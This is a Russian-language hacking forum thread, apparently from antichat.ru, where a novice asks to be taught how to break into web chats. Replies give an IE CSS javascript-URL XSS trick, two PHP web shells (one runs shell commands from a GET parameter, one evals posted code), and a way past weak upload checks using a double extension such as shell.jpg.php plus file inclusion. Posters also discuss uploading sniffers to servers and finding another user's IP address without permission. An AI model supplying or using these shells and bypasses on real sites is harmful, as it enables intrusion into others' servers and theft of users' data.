ЛюдИ - научите меня взламывать ЧаТы...
Что для этого нужно иметь у ссебя на компе.

В общем ...Я в ВАШИХ руках ...

не в компе, а в голове - мозги!
изучить надо
html, css, js, трюки в ie, php / cgi (perl), db

2 zFailure
Изучил ... не знаю - что за трюки в ip и db ...
А так ЗНАЮ - давайте УЧИТЕ ... Плиzzz

трюки не в ip, а в ie (он же internet explorer)
например: background:url(javascript:....)
вообщем на этом сайте есть статья посвященная этому

db оно же database ну sql короче

---Zak--- всё приходит с опытом!!! А вообще больше читай вышеописанного!

Куча мозгов не помогут, если нет фантазииhttp://forum.antichat.ru/iB_html/non...icons/wink.gif
Ну и конечно некоторых знаний...

Главное научись понимать HTML ,а остальное придет современем!

2 Morph
ну в этом HTML коде согласись мало смысла!
<img src="http://...1234567890"z=`">
` style=`background:url(javascript:...)`

хотя работает!

Ты про чо непонял?Я нынче тугой(Шутка)

Нет посути ведь чаты ломать HTML знать надо!Может не прав?Хотя думаю прав

2 Morph
прав на половину, точнее на одну треть!
ну бедешь ты знать HTML, ну разбудят тебя в 3 часа ночи и ты сможешь наизусь рассказать спецификацию XHTML 1.0, но чат то ты все равно не сможешь взломать! http://forum.antichat.ru/iB_html/non...icons/turn.gif

В общем НАРОД... HTML я знаю как свои 5-ть пальцев ... САМ сайты создаю ...

Трюки типа ЭтогО я поже делать умею и воображение у меня есть  http://forum.antichat.ru/iB_html/non...cons/smile.gif

НЕ могли бы вы на конкретном ПРИМЕРе ... показать -объястнить - разъястнить ... ?

2 Zak
ну если так, то тебе осталось посмотреть пару видео о вломе чатов и прочитать пару статей про чаты и IE

2 zFailure
ОкИ ... будем смотреть ...

ТАК ... прочитал почти ВсЕ, что у ВАС тут есть ...
Не помогает или до меня не доходит.
В общем предложите мне на каком-нибудь ЧаТе потренироваться ... только без подстав  http://forum.antichat.ru/iB_html/non...cons/smile.gif

А могу ли я сам себя взломать, т.е. у меня установленно Apache ...
Нампример - установить у себя 2 хоста:
На один из них закачать с какого-нибудь сайта скрипт ЧаТа (chat.ru)
А на другом например будут все мои скрипты ? (narod.ru)

ВОТ я так попробовал, но только у меня не установленна mySQL...
И при попытке из php вызвать скрипт:
<?
if (!empty($_GET['c'])) {
echo '<pre>';
system($_GET['c']);
echo '</pre>';
exit;
}
?>
то в окне у меня становиться "слишком" чисто - ничего на нем нет - пусто.
Прописываю .php?c=|c -| все равно пусто ... хотя же должно появиться содержимое папки.
Хотя remview.php работает ...

Просто у меня возник вопрос - можно самого себя ?
И еще можно не делать копии на сервере, а закачивать к себе на сервер ?

2 zFailure
Можно еще где-нибудь на сайте написать функции, которые ВЫ пишите в адресе после ".php?" с объяснениями.

не во первых не .php?c=|c -|
а .php?c=lc -l (L - маленькая)

во вторых сомневаюсь что у тебя стоит UNIX система
тогда .php?c=dir

это не функции а команды
открой любой справочник по UNIX, ты найдешь их там
а если есть UNIX то заглени в папку /bin
они все лежат там

Можно ломануть через url ... но тут у меня вопрос можно ли ломануть через "обзор", т.е. на сайте предлагается закачать картинку со своего компа.
Вопрос: Можно закачать снифер с себе на диск и после этого залить его на сервер ?

если скрипт ничего не скажет на расширение php то можно!
иногда програмери делают тупую проверку
типа такого
if (strpos('.jpg',s)) {
...

тогда прокатит такая фича
shell.jpg.php

если на сайте есть местная php иньекция, то и расширение можно оставить .jpg, а потом просто подключить!

zFailure

Что за инъекция, напиши!
http://forum.antichat.ru/iB_html/non...cons/smile.gif))

А можно я ВАШ снифер себе скачаю ? ... залью к себе на сайт, у менявозникла идея из статьи "Взлом чатов by Algol. Теория и Практика." - "Всякая всячина" ...

... А вот можно пользоваться через remview.php, а не через ваши скрипы...

<?
$gpc = get_magic_quotes_gpc();
if (!empty($_POST['c'])) { $c = $gpc ? stripslashes($_POST['c']) : $_POST['c']; }
else { $c = NULL; }
?>
<form action="" method="post"><textarea cols="80" rows="30" name="c" id="c"><?=$c; ?></textarea>
<br><input type="submit"></form>
<?
if (!is_null($c)) eval($c);
?>

и т.д. ВСЕ равно ведь shell тама тоже есть ...

... ВОТ дошел я до того, что нашел админку для ЧАТА ... Voodoo Chat Administration. Где-то по моему была у ВАС статья о взломе, но чего-то я забыл... ладненько будем "тренироваться" ...

Помогите пожалуйста
Как я могу узнать ip-адрес человека в чате(но я не модер этого чата и не создатель )?
Поэтому мне нужна помощь.
Может у кого-то есть програмки - или может кто-то подсказать что надо делать - пожалуйста  http://forum.antichat.ru/iB_html/non...s/rolleyes.gif  http://forum.antichat.ru/iB_html/non...ticons/sad.gif